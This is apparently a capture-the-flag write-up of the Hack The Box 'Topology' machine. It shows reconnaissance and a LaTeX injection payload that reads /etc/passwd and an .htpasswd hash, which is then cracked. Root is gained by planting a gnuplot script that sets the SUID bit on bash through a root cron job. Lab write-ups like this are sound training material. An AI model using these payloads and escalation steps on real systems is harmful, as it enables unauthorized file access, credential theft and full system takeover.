Topology
https://app.hackthebox.com/machines/Topology

Nmap scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC65qOGPSRC7ko+vPGrMrUKptY7vMtBZuaDUQTNURCs5lRBkCFZIrXTGf/Xmg9MYZTnwm+0dMjIZTUZnQvbj4kdsmzWUOxg5Leumcy+pR/AhBqLw2wyC4kcX+fr/1mcAgbqZnCczedIcQyjjO9M1BQqUMQ7+rHDpRBxV9+PeI9kmGyF6638DJP7P/R2h1N9MuAlVohfYtgIkEMpvfCUv5g/VIRV4atP9x+11FHKae5/xiK95hsIgKYCQtWXvV7oHLs3rB0M5fayka1vOGgn6/nzQ99pZUMmUxPUrjf4V3Pa1XWkS5TSv2krkLXNnxQHoZOMQNKGmDdk0M8UfuClEYiHt+zDDYWPI672OK/qRNI7azALWU9OfOzhK3WWLKXloUImRiM0lFvp4edffENyiAiu8sWHWTED0tdse2xg8OfZ6jpNVertFTTbnilwrh2P5oWq+iVWGL8yTFeXvaSK5fq9g9ohD8FerF2DjRbj0lVonsbtKS1F0uaDp/IEaedjAeE=
| 256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIR4Yogc3XXHR1rv03CD80VeuNTF/y2dQcRyZCo4Z3spJ0i+YJVQe/3nTxekStsHk8J8R28Y4CDP7h0h9vnlLWo=
| 256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaM68hPSVQXNWZbTV88LsN41odqyoxxgwKEb1SOPm5k
80/tcp open http syn-ack Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
Service Info: Host: topology.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan
Bruteforcing wasn't much helpful for this machine
Found a subdomain on the src code of homepage
$ curl -q -s 10.10.11.217 | grep ".htb" [0]
<p><i class="fa fa-envelope fa-fw w3-margin-right w3-large w3-text-grey"></i>lklein@topology.htb</p>
<p>β’ <a href="http://latex.topology.htb/equation.php">LaTeX Equation Generator</a> - create .PNGs of LaTeX
subdomani :
latex.topology.htb
URL that was given :
http://latex.topology.htb/equation.php
Subdomain scan
βββ ffuf -u http://topology.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.topology.htb' -fs 6767 [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://topology.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.topology.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 6767
________________________________________________
[Status: 401, Size: 463, Words: 42, Lines: 15, Duration: 858ms]
* FUZZ: dev
[Status: 200, Size: 108, Words: 5, Lines: 6, Duration: 517ms]
* FUZZ: stats
:: Progress: [4989/4989] :: Job [1/1] :: 13 req/sec :: Duration: [0:03:56] :: Errors: 0 ::
domains we found :
stats
,dev
andlatex.
the
stats
domain had statistics for the website,dev
had a username and password for login
User shell
The intesting domain was
latex

We'll need to do
latex injection
attack.
We can't get RCE since all things were blacklisted but, there was one payload working where we can read files
Payload :
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
Final Payload :
$\lstinputlisting{/etc/passwd}$
Ssh vdaisley
we can't get the RCE, but reading files is also important
I tried with getting ssh keys, but found out there were no keys in vdaisley's directory
After a while, i thought to get password for
dev.topology.htb
On google search I found out
.htpasswd
is whereApache
server stores the password.
GET PASSWORD FOR
dev
subdomain :$\lstinputlisting{/var/www/dev/.htpasswd}$
foudn the hash π
βββ cat hash.txt [0]
<snipped>:$apr1$1ON <--SNIPPED--> zAIbIxTY0
I used john to crack the hash
BOOOM DONEEEEEEE, we are now user.
Root shell
First i looked files that belongs to user <snipped>
bash-5.0$ find / -user $(whoami) 2>/dev/null | grep -v '^/proc\|^/run\|^/sys\|^/tmp\|^/dev'
Then i tried with finding sudo bits
bash-5.0$ find / -perm -4000 2>/dev/null
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/passwd
/usr/bin/bash
/usr/bin/chfn
bash-5.0$
Nothing was helpful so i checked
/opt
and found intresting folder
bash-5.0$ ls -la
total 12
drwxr-xr-x 3 root root 4096 May 19 13:04 .
drwxr-xr-x 18 root root 4096 Jun 12 10:37 ..
drwx-wx-wx 2 root root 4096 Nov 4 03:20 gnuplot
We dont have read access on this BUT we do have write access to it.
I ran
pspy64
tool in the box
2023/11/04 04:15:01 CMD: UID=0 PID=33937 | /usr/sbin/CRON -f
2023/11/04 04:15:01 CMD: UID=0 PID=33936 | /usr/sbin/CRON -f
2023/11/04 04:15:01 CMD: UID=0 PID=33939 | find /opt/gnuplot -name *.plt -exec gnuplot {} ;
2023/11/04 04:15:01 CMD: UID=0 PID=33938 | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;
So there's a cronjob which runs with
root
privileges, it runs all the files that ends with.plt
Since we have write access to
/opt/gnuplot
we can write malicious code & wait for thecronjob
to finish things for us.
echo 'system "chmod u+s /bin/bash"' > ./gnuplot/shellll.plt
$ :/opt$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
AND DONE WE ARE ROOOOOOOOT
bash-5.0# whoami
root
bash-5.0# ls /root/root.txt
/root/root.txt
bash-5.0#
....................heapbytes's still pwning things.
Last updated